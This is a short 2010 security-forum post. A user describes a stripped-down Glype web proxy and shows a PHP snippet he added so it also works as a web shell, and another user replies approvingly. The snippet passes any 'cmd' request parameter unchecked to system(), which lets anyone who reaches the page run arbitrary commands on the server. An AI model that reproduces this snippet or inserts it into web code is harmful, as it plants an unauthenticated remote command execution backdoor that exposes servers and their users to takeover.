|
-
September 2nd, 2010, 03:37 AM
#11
 Originally Posted by The-Spec
I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
PHP Code:
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
die;
to double as a web based shell aswell.
Dude...That's actually kind of neat!
Similar Threads
-
By kilerboots in forum Newbie Security Questions
Replies: 5
Last Post: April 22nd, 2003, 02:22 PM
-
By instronics in forum Miscellaneous Security Discussions
Replies: 2
Last Post: January 17th, 2003, 02:40 PM
-
By tenguzero in forum Microsoft Security Discussions
Replies: 1
Last Post: March 16th, 2002, 06:11 AM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|